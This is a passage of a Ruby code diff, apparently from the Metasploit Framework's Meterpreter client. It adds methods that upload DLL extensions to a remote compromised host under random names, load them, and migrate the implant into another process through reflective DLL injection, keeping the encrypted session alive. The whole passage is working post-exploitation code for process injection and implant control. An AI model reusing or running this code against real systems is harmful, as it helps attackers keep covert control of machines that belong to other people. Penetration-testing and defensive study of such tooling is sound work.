+			load_flags |= LOAD_LIBRARY_FLAG_ON_DISK
+		end
+		if (opts['Extension'])
+			load_flags |= LOAD_LIBRARY_FLAG_EXTENSION
+		end
+		# Create a request packet
+		request = Packet.create_request('core_loadlib')
+		# If we must upload the library, do so now
+		if ((load_flags & LOAD_LIBRARY_FLAG_LOCAL) != LOAD_LIBRARY_FLAG_LOCAL)
+			image = ''
+			::File.open(library_path, 'rb') { |f|
+				image = f.read
+			}
+			if (image != nil)
+				request.add_tlv(TLV_TYPE_DATA, image, false, true)
+			else
+				raise RuntimeError, "Failed to serialize library #{library_path}.", caller
+			end
+			# If it's an extension we're dealing with, rename the library
+			# path of the local and target so that it gets loaded with a random
+			# name
+			if (opts['Extension'])
+				library_path = "ext" + rand(1000000).to_s + ".#{client.binary_suffix}"
+				target_path  = library_path
+			end
+		end
+		# Add the base TLVs
+		request.add_tlv(TLV_TYPE_LIBRARY_PATH, library_path)
+		request.add_tlv(TLV_TYPE_FLAGS, load_flags)
+		if (target_path != nil)
+			request.add_tlv(TLV_TYPE_TARGET_PATH, target_path)
+		end
+		# Transmit the request and wait the default timeout seconds for a response
+		response = self.client.send_packet_wait_response(request, self.client.response_timeout)
+		# No response?
+		if (response == nil)
+			raise RuntimeError, "No response was received to the core_loadlib request.", caller
+		elsif (response.result != 0)
+			raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
+		end
+		return true
+	end
+	#
+	# Loads a meterpreter extension on the remote server instance and
+	# initializes the client-side extension handlers
+	#
+	#	Module
+	#		The module that should be loaded
+	#
+	#	LoadFromDisk
+	#		Indicates that the library should be loaded from disk, not from
+	#		memory on the remote machine
+	#
+	def use(mod, opts = { })
+		if (mod == nil)
+			raise RuntimeError, "No modules were specified", caller
+		end
+		# Get us to the installation root and then into data/meterpreter, where
+		# the file is expected to be
+		path = ::File.join(Msf::Config.install_root, 'data', 'meterpreter', 'ext_server_' + mod.downcase + ".#{client.binary_suffix}")
+		if (opts['ExtensionPath'])
+			path = opts['ExtensionPath']
+		end
+		path = ::File.expand_path(path)
+		# Load the extension DLL
+		if (load_library(
+				'LibraryFilePath' => path,
+				'UploadLibrary'   => true,
+				'Extension'       => true,
+				'SaveToDisk'      => opts['LoadFromDisk']))
+			client.add_extension(mod)
+		end
+		return true
+	end
+	#
+	# Migrates the meterpreter instance to the process specified
+	# by pid.  The connection to the server remains established.
+	#
+	def migrate( pid )
+		keepalive = client.send_keepalives
+		client.send_keepalives = false
+		process       = nil
+		binary_suffix = nil
+		# Load in the stdapi extension if not allready present so we can determine the target pid architecture...
+		client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
+		# Determine the architecture for the pid we are going to migrate into...
+		client.sys.process.processes.each { | p |
+			if( p['pid'] == pid )
+				process = p
+				break
+			end
+		}
+		# We cant migrate into a process that does not exist.
+		if( process == nil )
+			raise RuntimeError, "Cannot migrate into non existant process", caller
+		end
+		# We cant migrate into a process that we are unable to open
+		if( process['arch'] == nil or process['arch'].empty? )
+			raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
+		end
+		# And we also cant migrate into our own current process...
+		if( process['pid'] == client.sys.process.getpid )
+			raise RuntimeError, "Cannot migrate into current process", caller
+		end
+		# Create a new payload stub
+		c = Class.new( ::Msf::Payload )
+		c.include( ::Msf::Payload::Stager )
+		# Include the appropriate reflective dll injection module for the target process architecture...
+		if( process['arch'] == ARCH_X86 )
+			c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
+			binary_suffix = "dll"
+		elsif( process['arch'] == ARCH_X86_64 )
+			c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
+			binary_suffix = "x64.dll"
+		else
+			raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
+		end
+		# Create the migrate stager
+		migrate_stager = c.new()
+		migrate_stager.datastore['DLL'] = ::File.join( Msf::Config.install_root, "data", "meterpreter", "metsrv.#{binary_suffix}" )
+		payload = migrate_stager.stage_payload
+		# Build the migration request
+		request = Packet.create_request( 'core_migrate' )
+		request.add_tlv( TLV_TYPE_MIGRATE_PID, pid )
+		request.add_tlv( TLV_TYPE_MIGRATE_LEN, payload.length )
+		request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, payload, false, true)
+		if( process['arch'] == ARCH_X86_64 )
+			request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64
+		else
+			request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 1 ) # PROCESS_ARCH_X86
+		end
+		# Send the migration request (bump up the timeout to 60 seconds)
+		response = client.send_request( request, 60 )
+		# Disable the socket request monitor
+		client.monitor_stop
+		###
+		# Now communicating with the new process
+		###
+		# Renegotiate SSL over this socket
+		client.swap_sock_ssl_to_plain()
+		client.swap_sock_plain_to_ssl()
+		# Restart the socket monitor
+		client.monitor_socket
+		# Update the meterpreter platform/suffix for loading extensions as we may have changed target architecture
+		# sf: this is kinda hacky but it works. As ruby doesnt let you un-include a module this is the simplest solution I could think of.
+		# If the platform specific modules Meterpreter_x64_Win/Meterpreter_x86_Win change significantly we will need a better way to do this.
+		if( process['arch'] == ARCH_X86_64 )
+			client.platform      = 'x64/win64'
+			client.binary_suffix = 'x64.dll'
+		else
+			client.platform      = 'x86/win32'
+			client.binary_suffix = 'dll'
+		end
+		# Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
+		client.ext.aliases.keys.each { |e|
+			client.core.use(e)
+		}
+		# Restore session keep-alives
+		client.send_keepalives = keepalive
+		return true
+	end
+end
+end; end; end